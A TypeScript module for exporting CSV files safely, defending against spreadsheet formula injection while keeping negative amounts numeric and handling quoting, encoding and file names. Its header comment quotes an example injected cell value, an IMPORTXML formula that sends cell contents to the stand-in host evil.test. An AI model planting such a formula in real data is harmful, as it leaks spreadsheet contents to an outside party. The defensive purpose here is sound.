/**
 * Writing a CSV somebody will open in a spreadsheet.
 *
 * ## The thing this file is really about
 *
 * A customer name in this product came out of somebody's spreadsheet. It can be
 * anything, including `=IMPORTXML(CONCAT("http://evil.test/?",A1),"//a")` — and
 * when the export is opened in Excel or Sheets, that is not a name any more, it
 * is a formula that runs. It can read other cells and send them somewhere. The
 * person who gets attacked is not the one who typed it; it is whoever opens the
 * export, which is usually somebody senior.
 *
 * So every **text** cell that begins with a character a spreadsheet treats as
 * the start of a formula is prefixed with an apostrophe, which spreadsheets
 * read as "this is text" and do not show.
 *
 * ## The trap in the fix
 *
 * `-` is one of those characters. It is also the first character of every
 * negative amount. Sanitising cells by their content would turn `-1500` into
 * the text `'-1500`, and a column of amounts would stop adding up — which is a
 * worse bug than the one being fixed, because it is silent and it is in the
 * money.
 *
 * The answer is that **numbers are never sanitised, because numbers are never
 * text**. `numberCell()` takes a number and formats it; `textCell()` takes a
 * string and protects it. A caller cannot accidentally send an amount through
 * the text path without writing `String(amount)`, which is visible in review.
 */

/** Characters a spreadsheet reads as the beginning of a formula. */
const DANGEROUS = ['=', '+', '-', '@', '\t', '\r'];

/**
 * One text value, safe to open.
 *
 * Prefixed rather than stripped: removing the character would change a real
 * name, and `+44 20 7946 0000` is a phone number somebody needs.
 */
export function safeText(value: string | null | undefined): string {
    const text = String(value ?? '');
    if (text === '') return '';
    return DANGEROUS.includes(text[0]!) ? `'${text}` : text;
}

/**
 * One field, quoted for CSV.
 *
 * Quoted whenever it contains a comma, a quote, a newline or leading or
 * trailing space — and doubled quotes inside, which is the one piece of CSV
 * everybody gets wrong.
 */
export function csvField(value: string): string {
    if (value === '') return '';
    const needsQuotes = /[",\r\n]/.test(value) || value !== value.trim();
    return needsQuotes ? `"${value.replace(/"/g, '""')}"` : value;
}

export type CellValue = string | number | boolean | null | undefined;

/** A text cell: protected against formulas, then quoted. */
export const textCell = (value: string | null | undefined): string => csvField(safeText(value));

/**
 * A numeric cell: written as a number, never sanitised.
 *
 * No thousands separator and no currency symbol — a spreadsheet needs to read
 * this as a number, and `£1,234.00` is a string in every locale. The company's
 * currency belongs in the column heading, where it is said once.
 */
export const numberCell = (value: number | null | undefined): string => {
    // Explicitly, because `Number(null)` is 0 and an absent amount exported as
    // `0` reads as "owes nothing" rather than "not recorded" — a difference
    // somebody would act on.
    if (value === null || value === undefined) return '';
    const n = Number(value);
    return Number.isFinite(n) ? String(n) : '';
};

/** A date cell, as the plain calendar day the row already carries. */
export const dateCell = (value: string | null | undefined): string => {
    const text = String(value ?? '');
    return /^\d{4}-\d{2}-\d{2}/.test(text) ? text.slice(0, 10) : '';
};

export const boolCell = (value: boolean | null | undefined): string => (value ? 'Yes' : 'No');

export interface CsvColumn<T> {
    /** The heading, written once. Say the currency here, not in every cell. */
    header: string;
    cell: (row: T) => string;
}

/**
 * The whole file.
 *
 * A UTF-8 byte order mark leads, because without one Excel on Windows reads the
 * file as the system codepage and every accented customer name arrives
 * mangled — which looks like the product corrupted the data.
 *
 * CRLF line endings, which is what RFC 4180 says and what the awkward readers
 * expect.
 */
export function toCsv<T>(columns: readonly CsvColumn<T>[], rows: readonly T[]): string {
    const lines = [columns.map(c => textCell(c.header)).join(',')];
    for (const row of rows) {
        lines.push(columns.map(c => c.cell(row)).join(','));
    }
    return `﻿${lines.join('\r\n')}\r\n`;
}

/**
 * A file name that will not surprise anybody.
 *
 * The company's name is in it, because somebody exporting two companies in one
 * morning needs to tell the files apart — reduced to letters, digits and
 * hyphens so it is a filename on every operating system.
 */
export function csvFileName(what: string, company: string, day: string): string {
    const clean = (value: string) =>
        value.toLowerCase().replace(/[^a-z0-9]+/g, '-').replace(/^-+|-+$/g, '').slice(0, 40);
    return [clean(what), clean(company), day].filter(Boolean).join('-') + '.csv';
}
